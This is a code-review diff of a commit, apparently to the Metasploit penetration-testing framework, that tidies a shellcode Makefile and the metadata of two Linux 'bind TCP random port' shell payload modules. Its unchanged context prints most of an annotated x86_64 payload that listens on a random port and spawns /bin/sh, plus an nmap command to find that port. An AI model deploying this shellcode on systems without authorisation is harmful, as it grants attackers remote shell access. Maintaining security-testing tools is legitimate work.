Fixes for #2350, random bind shellcode
* Moved shortlink to a reference. * Reformat e-mail address. * Fixed whitespace * Use multiline quote per most other module descriptions Still need to resplat the modules, but it's no big thang to do that after landing. Also, References do not seem to appear for post modules in the normal msfconsole. This is a bug in the UI, not for these modules -- many payloads would benefit from being explicit on their references, so may as well start with these.bug/bundler_fix
parent
31f265b411
commit
81a7b1a9bf
|
@ -1,11 +1,11 @@
|
||||||
STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
|
STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
|
||||||
stager_egghunt stager_sock_find stager_sock_reverse \
|
stager_egghunt stager_sock_find stager_sock_reverse \
|
||||||
stager_sock_reverse_icmp stager_sock_reverse_udp \
|
stager_sock_reverse_icmp stager_sock_reverse_udp \
|
||||||
stager_sock_reverse_udp_dns
|
stager_sock_reverse_udp_dns
|
||||||
STAGES=stage_tcp_shell stage_udp_shell
|
STAGES=stage_tcp_shell stage_udp_shell
|
||||||
SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \
|
SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \
|
||||||
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
|
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
|
||||||
single_shell_bind_tcp_random_port
|
single_shell_bind_tcp_random_port
|
||||||
|
|
||||||
OBJS=${STAGERS} ${STAGES} ${SINGLE}
|
OBJS=${STAGERS} ${STAGES} ${SINGLE}
|
||||||
|
|
||||||
|
@ -38,11 +38,11 @@ all: $(SINGLE) $(STAGES) $(STAGERS)
|
||||||
@ruby -p -a -e ' \
|
@ruby -p -a -e ' \
|
||||||
$$F.shift; \
|
$$F.shift; \
|
||||||
$$F[0].tap { |s| \
|
$$F[0].tap { |s| \
|
||||||
s.tr! "A-F", "a-f"; \
|
s.tr! "A-F", "a-f"; \
|
||||||
t=s.dup; \
|
t=s.dup; \
|
||||||
s.clear; \
|
s.clear; \
|
||||||
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
|
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
|
||||||
STDIN.eof? ? s<< " # " : s<< "+# "; \
|
STDIN.eof? ? s<< " # " : s<< "+# "; \
|
||||||
}; \
|
}; \
|
||||||
$$_ = $$F.join(" ") + "\n"; \
|
$$_ = $$F.join(" ") + "\n"; \
|
||||||
' < $*.tmp > $@
|
' < $*.tmp > $@
|
||||||
|
|
|
@ -15,11 +15,13 @@ module Metasploit3
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(merge_info(info,
|
super(merge_info(info,
|
||||||
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
|
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
|
||||||
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
|
'Description' => %q{
|
||||||
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
|
Listen for a connection in a random port and spawn a command shell.
|
||||||
'Assembly source: http://goo.gl/TAveVc',
|
Use nmap to discover the open port: 'nmap -sS target -p-'.
|
||||||
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
|
},
|
||||||
|
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
|
||||||
'License' => BSD_LICENSE,
|
'License' => BSD_LICENSE,
|
||||||
|
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm'],
|
||||||
'Platform' => 'linux',
|
'Platform' => 'linux',
|
||||||
'Arch' => ARCH_X86_64,
|
'Arch' => ARCH_X86_64,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
|
@ -31,21 +33,21 @@ module Metasploit3
|
||||||
"\x6a\x02" +# pushq $0x2
|
"\x6a\x02" +# pushq $0x2
|
||||||
"\x5f" +# pop %rdi
|
"\x5f" +# pop %rdi
|
||||||
"\xb0\x29" +# mov $0x29,%al
|
"\xb0\x29" +# mov $0x29,%al
|
||||||
"\x0f\x05" +# syscall
|
"\x0f\x05" +# syscall
|
||||||
"\x52" +# push %rdx
|
"\x52" +# push %rdx
|
||||||
"\x5e" +# pop %rsi
|
"\x5e" +# pop %rsi
|
||||||
"\x50" +# push %rax
|
"\x50" +# push %rax
|
||||||
"\x5f" +# pop %rdi
|
"\x5f" +# pop %rdi
|
||||||
"\xb0\x32" +# mov $0x32,%al
|
"\xb0\x32" +# mov $0x32,%al
|
||||||
"\x0f\x05" +# syscall
|
"\x0f\x05" +# syscall
|
||||||
"\xb0\x2b" +# mov $0x2b,%al
|
"\xb0\x2b" +# mov $0x2b,%al
|
||||||
"\x0f\x05" +# syscall
|
"\x0f\x05" +# syscall
|
||||||
"\x57" +# push %rdi
|
"\x57" +# push %rdi
|
||||||
"\x5e" +# pop %rsi
|
"\x5e" +# pop %rsi
|
||||||
"\x48\x97" +# xchg %rax,%rdi
|
"\x48\x97" +# xchg %rax,%rdi
|
||||||
"\xff\xce" +# dec %esi
|
"\xff\xce" +# dec %esi
|
||||||
"\xb0\x21" +# mov $0x21,%al
|
"\xb0\x21" +# mov $0x21,%al
|
||||||
"\x0f\x05" +# syscall
|
"\x0f\x05" +# syscall
|
||||||
"\x75\xf8" +# jne 40009f
|
"\x75\xf8" +# jne 40009f
|
||||||
"\x52" +# push %rdx
|
"\x52" +# push %rdx
|
||||||
"\x48\xbf\x2f\x2f\x62" +# movabs $0x68732f6e69622f2f,%rdi
|
"\x48\xbf\x2f\x2f\x62" +# movabs $0x68732f6e69622f2f,%rdi
|
||||||
|
@ -54,7 +56,7 @@ module Metasploit3
|
||||||
"\x54" +# push %rsp
|
"\x54" +# push %rsp
|
||||||
"\x5f" +# pop %rdi
|
"\x5f" +# pop %rdi
|
||||||
"\xb0\x3b" +# mov $0x3b,%al
|
"\xb0\x3b" +# mov $0x3b,%al
|
||||||
"\x0f\x05" # syscall
|
"\x0f\x05" # syscall
|
||||||
}
|
}
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
|
@ -15,11 +15,13 @@ module Metasploit3
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(merge_info(info,
|
super(merge_info(info,
|
||||||
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
|
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
|
||||||
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
|
'Description' => %q{
|
||||||
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
|
Listen for a connection in a random port and spawn a command shell.
|
||||||
'Assembly source: http://goo.gl/V5OObo',
|
Use nmap to discover the open port: 'nmap -sS target -p-'.
|
||||||
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
|
},
|
||||||
|
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
|
||||||
'License' => BSD_LICENSE,
|
'License' => BSD_LICENSE,
|
||||||
|
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm'],
|
||||||
'Platform' => 'linux',
|
'Platform' => 'linux',
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
|
|
Loading…
Reference in New Issue